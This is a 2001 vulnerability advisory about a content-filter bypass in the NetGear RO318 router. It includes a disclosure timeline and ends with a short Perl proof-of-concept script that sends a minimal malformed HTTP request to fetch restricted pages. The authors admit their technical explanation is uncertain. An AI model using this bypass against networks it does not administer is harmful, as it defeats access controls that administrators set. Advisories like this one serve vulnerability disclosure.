=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ NetGear RO318 HTTP Filter Advisory                                             =+
=+ Null Byte Security                                                             =+
=+ http://home.tampabay.rr.com/nbs/                                               =+
=+ don't call it a come back                                                      =+
=+ nbs@tampabay.rr.com                                                            =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ Contents Table                                                                 =+
=+                                                                                =+
=+ 1.About                                                                        =+
=+ 2.Affected                                                                     =+
=+ 3.Details                                                                      =+
=+ 4.Contact                                                                      =+
=+ 5.Conclusion                                                                   =+
=+ 6.Thanks                                                                       =+
=+ 7.Greets                                                                       =+
=+ 8.POC                                                                          =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 1.About                                                                        =+
=+                                                                                =+
=+ NETGEAR's sturdy metal RO318 Cable/DSL Security Router with 8-port switch      =+
=+ fully protects your small office network against intrusion. Equipped with      =+
=+ Stateful Packet Inspection to prevent Denial of Service (DoS) attacks, and     =+
=+ Network Address Translation (NAT) to maintain network security against         =+
=+ hackers, it ensures prolonged up time and maximized productivity for your      =+
=+ network. Web content filtering options let network administrators establish    =+
=+ restricted access policies - based on the time of day, day of week, Web        =+
=+ address keyword - and receive regular reports and instant alerts via e-mail on =+
=+ hacker attempts and browsing activities. Web-based installation instructions   =+
=+ make setup easy. Your network up and running, and sharing high-speed Internet  =+
=+ access with up to 253 users, in less than an hour.                             =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 2.Affected                                                                     =+
=+                                                                                =+
=+ NetGear RO318 Cable/DSL Security Router                                        =+
=+                                                                                =+
=+ Although the NetGear RO318 is the only router listed here we are sure there    =+
=+ other routers that use the RO318's web filtering technology.                   =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 3.Details                                                                      =+
=+                                                                                =+
=+ We are not too sure of the details ourselves because of time restraints, but   =+
=+ we do have an idea. One, the web filtering component in the firmware only      =+
=+ checks for fully constructed requests and thus sending a malformed, somewhat,  =+
=+ request results in the retrieval of restricted content.                        =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 4.Contact                                                                      =+
=+                                                                                =+
=+ December 2 2001: Contacted NetGear                                             =+
=+ December 2 2001: Contacted online support                                      =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460001)       =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460003)       =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460006)       =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460008)       =+
=+ December 8 2001: Five working days passed                                      =+
=+ December 20 2001: Eighteen days passed                                         =+
=+ December 20 2001: Advisory released on home.tampabay.rr.com/nbs/               =+
=+ December 26 2001: POC released                                                 =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 5.Conclusion                                                                   =+
=+                                                                                =+
=+ This is definitely a security vulnerability and not a feature. We hope Net     =+
=+ Gear will fix this with their next firmware release so administrators can      =+
=+ restrict necessary web-content without having to worry about this bug.         =+
=+                                                                                =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 6.Thanks                                                                       =+
=+                                                                                =+
=+ Bi0cide for the help                                                           =+
=+ Datagram for the help                                                          =+
=+ Natas for the help                                                             =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 7.Greets                                                                       =+
=+                                                                                =+
=+ Bi0cide, Natas, Datagram, Z, Medium, BrainStorm, Qitest1, Skerbi, RootX11,     =+
=+ Doug, Bios Disk, Decypher, Notten, RFP, Johnny (johnny.ihackstuff.com), RFP,   =+
=+ Mixter, Pimpshiz, Doxavg, Todd, Sekurity Inc (www.sekurity.net), Packet Storm, =+
=+ Security Focus, and everyone else.                                             =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 8.POC                                                                          =+
=+                                                                                =+
#!/usr/bin/perl
#don't call it a come back
#nbs@tampabay.rr.com

use IO::Socket;
use Getopt::Std;

getopts('h:p:z', \%argv);

if(!defined($argv{h}))
{
    print"NetGear RO318 Web Filter Bypass Exploit by Null Byte Security   \n";

    print"Usage: $0 -h <host> -p <port>                                   \n";
    exit;
}

if(defined($argv{h}))
{
    &begin
}

sub begin
{
    $html   = html;
    $host   = $argv{h};
    if(defined $argv{p})
    {
        $port=$argv{p};
    }
    else
    {
        $port = "80";
    }

    $socket = IO::Socket::INET->new (Proto => "tcp",
                                  PeerAddr => $host,
                                  PeerPort => "$port")
                                  or die "Connection Refused.\n";

    print $socket "GET / HTTP/1.0\n\n";
    while (<$socket>)
    {
        open(LOG, ">>$html");
        print (LOG);
    }
    close $socket;
}
=+                                                                                =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ http://www.wiretrip.net/rfp/policy.html                                        =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+